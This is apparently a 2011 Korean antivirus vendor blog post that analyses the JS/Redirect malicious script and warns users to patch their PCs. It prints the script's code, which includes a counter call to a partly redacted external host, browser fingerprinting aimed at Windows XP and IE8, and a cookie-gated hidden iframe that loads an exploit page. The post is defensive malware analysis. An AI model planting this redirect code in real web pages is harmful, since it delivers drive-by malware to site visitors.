본문 바로가기
악성코드 정보

JS/Redirect, 너의 정체를 밝혀라!

by 알 수 없는 사용자 2011. 3. 26.

1. 서 론

JS/Redirect는 자바 스크립트로 제작되었고 다른 악성 스크립트를 다운로드 하여 실행하는 악성 스크립트에 대한 진단명이다. 주말을 기점으로 해서 JS/Redirect가 악성코드 Top 10 2위에 랭크되어 있어 사용자들의 주의가 필요하다.

[그림 1] 악성코드 Top 10

 

2. JS/Redirect, 너의 정체는???

최근에 V3에 추가된 JS/Redirect를 분석해 보면 코드는 아주 간단하다.

 

// 접속 PC의 현황을 카운트하는 URL

<script language="javascript" src="http://count31.[중간생략].com/click.aspx?id=311957987&logo=1" charset="gb2312"></script>

 

<SCRIPT LANGUAGE="JavaScript">

<!-- Hide

function killErrors() {

return true;

}

window.onerror = killErrors;

// -->

// JS/Redirect가 실행될 조건 1

fEfYgDH1=navigator.userAgent.toLowerCase();

laAtA3=((fEfYgDH1.indexOf('windows nt 5.1')!=-1)||(fEfYgDH1.indexOf('windows xp')!=-1));

if(laAtA3&&navigator.userAgent.toLowerCase().indexOf("\x6D"+"\x73"+"\x69"+"\x65 \x38")!=-1)

location.replace("about:blank");

</script>

 

navigator.userAgent.toLowerCase()는 브라우저에서 사용하는 user agent의 정보를 얻는 함수

mozilla/4.0 (compatible; msie 8.0; windows nt 6.1; trident/4.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3.0.30729; media center pc 6.0; mddc)

 

<script>

// JS/Redirect가 실행될 조건 2

window.onerror=function(){return true;}

if(document.cookie.indexOf("KXBXL=")==-1)

{

 

// 중복실행 방지를 위한 쿠키생성

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

document.cookie="KXBXL=Yes;path=/;expires="+expires.toGMTString();

document.write("<iframe width=100 height=0 src=load.html></iframe>");

}

</SCRIPT>

 

load.html은 흔히 해킹된 국내 웹 사이트를 통해서 유포되며, Internet Explorer의 보안 취약점을 통해서 악성코드를 다운로드하는 악성 스크립트로 추정된다. 주말만 되면  해킹된 웹을 통해서 유포되는 악성코드들에 대한 진단건수가 증가하는 상황이므로 꼭 자신이 사용하는 PC의 보안 업데이트는 적용해야 한다.

만약 악성코드에 감염되고 싶다면 어떻게 하면 될까?????

댓글